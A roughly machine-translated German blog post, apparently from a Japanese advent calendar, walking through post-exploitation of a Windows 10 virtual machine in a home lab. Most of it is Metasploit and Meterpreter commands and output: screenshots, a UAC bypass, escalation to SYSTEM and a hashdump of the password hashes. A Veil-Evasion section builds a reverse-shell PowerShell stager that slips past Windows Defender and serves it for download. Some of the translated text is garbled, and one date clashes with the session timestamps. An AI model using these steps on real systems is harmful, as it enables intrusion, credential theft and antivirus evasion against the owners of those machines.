[LINUX] Fortsetzung, erster Windows 10-Hack
Einführung
Es ist der 15. Tag des Adventskalenders von PRO Co., Ltd. Entschuldigung für die späte Veröffentlichung ...! !! !!
Dieser Artikel ist eine Fortsetzung von "First Windows 10 Hacking". Ich werde versuchen, Sie zum Nachdenken zu bringen: "Ist es möglich, dies zu tun?" Auch wenn Sie es alleine betrachten, aber wenn Sie es selbst versuchen möchten, Vorheriger Artikel / items / 1d035b0413ab60674ccb) Bitte fügen Sie es auch bei.
Dinge die zu tun sind
Beim letzten Mal habe ich versucht, die von VM aus der Angriffsumgebung (Kali Linux) erstellte Zielumgebung (Windows 10) mit einem Tool namens Metasploit Framework (im Folgenden: Metasploit) anzugreifen und fernzusteuern. Lassen Sie uns diesmal einige der Dinge erleben, die nach dem Einbruch in das Zielterminal zu tun sind.
- Einen Screenshot machen
- Erwerb der SYSTEM-Berechtigung
- Holen Sie sich den Windows-Passwort-Hash
- Vermeiden Sie die Erkennung von Antivirenviren
Hier wird davon ausgegangen, dass die Meterpreter-Sitzung im Voraus eingerichtet wurde (Vorheriger Artikel "Ermöglichen der Steuerung des Zielterminals vom Angriffsterminal aus" / 1d035b0413ab60674ccb #% E6% 94% BB% E6% 92% 83% E7% AB% AF% E6% 9C% AB% E3% 81% 8B% E3% 82% 89% E3% 82% BF% E3% 83% BC% E3% 82% B2% E3% 83% 83% E3% 83% 88% E7% AB% AF% E6% 9C% AB% E3% 82% 92% E5% 88% B6% E5% BE% A1% Siehe E3% 81% A7% E3% 81% 8D% E3% 82% 8B% E3% 82% 88% E3% 81% 86% E3% 81% AB% E3% 81% 99% E3% 82% 8B)) ..
Hinweis!
Dieser Artikel soll keinen unbefugten Zugriff empfehlen. ** Mach niemals das, was du in einer anderen Umgebung vorstellst **
Überprüfungsumgebung
Entspricht Letztes Mal.
- Host-Betriebssystem: macOS 10.15.2 Beta
- Gastbetriebssystem
- Angriffsterminal: Kali Linux 5.3.0-kali2-amd64
- Zielterminal: Windows10 --Virtualisierungssoftware: VirtualBox 6.0.14 r133895 (Qt5.6.3)
| Terminal | IP Adresse |
|---|---|
| Kali Linux (Angriffsterminal) | 10.0.0.2 |
| Windows10 (Zielterminal) | 10.0.0.102 |
Mache ein Bildschirmfoto
Geben Sie den folgenden Befehl ein, um den aktuell auf dem Zielterminal angezeigten Bildschirm aufzunehmen.
meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg
Der rote Rahmen ist ein Screenshot des Zielterminals.
Holen Sie sich die SYSTEM-Berechtigung
Wenn Sie keine Administratorrechte haben, werden verschiedene Vorgänge eingeschränkt, sodass Sie Ihre Berechtigungen erhöhen müssen.
Versuch, die Autorität mit dem Befehl getsystem zu erhöhen (Fehler)
Überprüfen Sie die aktuellen Berechtigungen.
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa
Meterpreter stellt einen Befehl getsystem bereit, der versucht, auf SYSTEM-Berechtigungen zuzugreifen, der jedoch fehlschlägt, weil der eindringende Benutzer über niedrige Berechtigungen verfügt.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Probieren Sie ein Modul aus, das die UAC-Funktionalität umgeht
Der Befehl getsystem ist fehlgeschlagen, da er von der Windows-Benutzerkontensteuerung (UAC) blockiert wurde und nach einem Modul sucht, um ihn zu umgehen.
Bringen Sie zuerst die Meterpreter-Eingabeaufforderung in den Hintergrund und zurück zur msf-Eingabeaufforderung.
meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) >
Überprüfen Sie die verbundene Sitzung
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)
Suchen Sie nach Modulen mit dem Schlüsselwort "bypassuac".
msf5 exploit(multi/handler) > search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
2 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler)
3 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
4 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
5 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
6 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
7 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
9 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
10 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
11 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
12 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
Verwenden Sie die folgenden Module, um Exploit über eingerichtete Sitzungen zu senden.
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup <----Eingabemodul verwenden
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets <----Eingang
Exploit targets:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0 <----Eingabe des Zielsatzes
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1 <----Sitzungssatz eingeben
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp <----Legen Sie die Eingangszielnutzlast fest
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2 <----Eingabe: Stellen Sie den Standby-Host ein
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options <----Bestätigung der Eingabeeinstellung
Module options (exploit/windows/local/bypassuac_silentcleanup):
Name Current Setting Required Description
---- --------------- -------- -----------
PSH_PATH %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe yes The path to the Powershell binary.
SESSION 1 yes The session to run this module on.
SLEEPTIME 0 no The time (ms) to sleep before running SilentCleanup
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit <----Eingabeausführung
[*] Started reverse TCP handler on 10.0.0.2:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900
meterpreter > <--Erfolg, wenn die Meterpreter-Eingabeaufforderung zurückgegeben wird
Versuchen Sie erneut, die Autorität mit getsystem zu erhöhen (Erfolg)
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa <--Normaler Benutzer vor der Ausführung
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM <--SYSTEM Autorität
Sie haben jetzt SYSTEM-Berechtigungen.
Holen Sie sich den Passwort-Hash
Nachdem Sie SYSTEM-Berechtigungen erhalten haben, können Sie unter anderem einen Kennwort-Hash abrufen. Der erhaltene Hash wird hauptsächlich für die Kennwortanalyse von Windows verwendet. Außerdem wird die Passwortanalyse diesmal nicht behandelt.
Wenn es sich um ein lokales Konto handelt, wird die Anmeldeauthentifizierung in der SAM-Datenbank (Datei "C: \ Windows \ System32 \ config \ SAM") verwaltet und das Kennwort im Hash-Format aufgezeichnet.
In Metasploit können Sie den Kennwort-Hash mit dem Befehl run hashdump abrufen. Wenn Sie jedoch keine SYSTEM-Berechtigungen haben, wird eine Fehlermeldung angezeigt.
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
<Kennwort-Hash>
Es wird im Teil
Vermeiden Sie Antivirenprogramme
Richten Sie eine Meterpreter-Sitzung ein, indem Sie die Virenerkennung durch Antivirus vermeiden.
Erstellen Sie eine Nutzlast, die Virenschutz in Veil vermeidet
Installieren Sie Veil Framework
Veil Framwwork (Veil) Eine Gruppe von Tools, die Nutzdaten generieren, die sich dem Virenschutz entziehen.
Veil ist unter Kali Linux nicht verfügbar. Installieren Sie es daher separat.
root@kali:~# apt install veil-evasion
Schleier starten
Führen Sie den folgenden Befehl mit der GUI-Anmeldung bei Kali aus. Unterwegs werden Sie gefragt, ob Sie die Abhängigkeiten installieren möchten. Wählen Sie daher "s" (Installation im unbeaufsichtigten Modus).
root@kali:~# veil
===============================================================================
Veil | [Version]: 3.1.12
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
- Wenn Sie es ausführen, während Sie bei SSH angemeldet sind, schlägt der Dialog fehl und bei der Installation von Wine tritt ein Fehler auf.
[!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe). Run: /usr/share/veil/config/setup.sh --force --silent
Erstellen Sie eine Nutzlast mit Veil
Schleier aktualisieren
Die Technologien zur Erkennung und Umgehung von Viren werden ständig aktualisiert. Halten Sie sie daher auf dem neuesten Stand, um die Erfolgsrate der Umgehung so weit wie möglich zu steigern.
Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.
Veil has checked for updates, press enter to continue
Wählen Sie ein Werkzeug
Zwei Tools, Evasion und Ordnance, wurden geladen, aber ich wähle Evasion, weil dadurch die Virenerkennung vermieden wird.
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
41 payloads loaded
Available Commands:
back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload
Wählen Sie eine Nutzlast
Wählen Sie "Powershell / Meterpreter / rev_tcp.py" aus der Liste aus. Dies ist die Reverse Shell für Windows.
Veil/Evasion>: list <--Eingang
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
1) autoit/shellcode_inject/flat.py
2) auxiliary/coldwar_wrapper.py
<Ausgelassen>
22) powershell/meterpreter/rev_tcp.py
<Ausgelassen>
41) ruby/shellcode_inject/flat.py
Veil/Evasion>: use 22 <--Eingang
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Name: Pure PowerShell Reverse TCP Stager
Language: powershell
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode
Payload: powershell/meterpreter/rev_tcp selected
Required Options:
Name Value Description
---- ----- -----------
BADMACS FALSE Checks for known bad mac addresses
DOMAIN X Optional: Required internal domain
HOSTNAME X Optional: Required system hostname
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
MINBROWSERS FALSE Minimum of 2 browsers
MINPROCESSES X Minimum number of processes running
MINRAM FALSE Require a minimum of 3 gigs of RAM
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Window pops up prior to payload
UTCCHECK FALSE Check that system isn't using UTC time zone
VIRTUALPROC FALSE Check for known VM processes
Available Commands:
back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option
[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2 <--Eingabe Geben Sie das Angriffsterminal als Verbindungsziel an
[powershell/meterpreter/rev_tcp>>]: options <--Bestätigung der Eingabeeinstellung
<Ausgelassen>
Broschürenerstellung
Erstellen Sie mit dem Befehl generate.
[powershell/meterpreter/rev_tcp>>]: generate <--Eingang
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[>] Please enter the base name for output files (default is payload): evil3 <--Geben Sie den Namen der eingegebenen Nutzlast an
<Ausgelassen>
Beenden Sie Veil mit dem Befehl exit und kopieren Sie die erstellte Nutzlast auf Ihren Desktop.
Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop
Vermeiden Sie den Echtzeitschutz von Windows Defender
Wenn Sie in der von Metasploit erstellten Nutzlast den Echtzeitschutz von Windows nicht deaktivieren, wird er zur Download- und Laufzeit erkannt und Sie können keine Sitzung einrichten. Die hier erstellte Nutzlast kann jedoch heruntergeladen und ausgeführt werden, ohne erkannt zu werden. (Stand Dezember 2009).
Ermöglichen Sie das externe Herunterladen der Nutzdaten
Legen Sie die erstellte Nutzlast in einen Ordner, der von außen heruntergeladen werden kann, und versetzen Sie sie mit meterpreter in den Standby-Zustand der Reverse Shell. Geben Sie die Nutzdaten als "windows / meterpreter / reverse_tcp" an.
root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Abkürzung>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit
Laden Sie die Nutzdaten herunter
Laden Sie evil3.bat auf das Zielgerät herunter. Es wird zu diesem Zeitpunkt nicht als Virus erkannt.
Führen Sie die Nutzlast aus
evil3.bat Doppelklicken Sie, um einen Warnbildschirm anzuzeigen, klicken Sie jedoch in den Detailinformationen auf Ausführen.
Wenn auf der Kali-Seite eine Reaktion auftritt und die Meterpreter-Eingabeaufforderung zurückgegeben wird, bedeutet dies, dass die Sitzung ohne Erkennung eingerichtet wurde. Wenn Sie keine Eingabeaufforderung erhalten, wird diese möglicherweise durch eine Funktion Ihrer Sicherheitssoftware blockiert.
Schließlich
Dieses Mal fiel es mir schwer, die SYSTEM-Berechtigung zu erhalten, da die Sitzung nicht ordnungsgemäß eingerichtet wurde und der Schleier nicht gestartet wurde. Grundsätzlich ist es so vorbereitet, dass Sie mit einem Befehl alles machen können, und ich fand es einfach, aber wenn Sie den Inhalt nicht gut verstehen, ist es meiner Meinung nach schwierig geworden, mit Dingen umzugehen, die schief gehen. Es ist beängstigend, dass selbst eine solche Person dies relativ leicht tun kann.
Referenz
[IPUSIRON "So erstellen Sie ein Hacking-Labor: Hacker-Erfahrung beim Lernen in einer virtuellen Umgebung" Shosuisha (Amazon)](https://www.amazon.co.jp/%E3%83%8F%E3%83%83%E3%82 % AD% E3% 83% B3% E3% 82% B0% E3% 83% BB% E3% 83% A9% E3% 83% 9C% E3% 81% AE% E3% 81% A4% E3% 81% 8F % E3% 82% 8A% E3% 81% 8B% E3% 81% 9F-% E4% BB% AE% E6% 83% B3% E7% 92% B0% E5% A2% 83% E3% 81% AB% E3% 81% 8A% E3% 81% 91% E3% 82% 8B% E3% 83% 8F% E3% 83% 83% E3% 82% AB% E3% 83% BC% E4% BD% 93% E9% A8% 93% E5% AD% A6% E7% BF% 92-IPUSIRON-ebook / dp / B07JJKLZNW) FAQ zur Support-Site "So erstellen Sie ein Hacking-Labor" für "Lernen von Hacker-Erfahrungen in einer virtuellen Umgebung"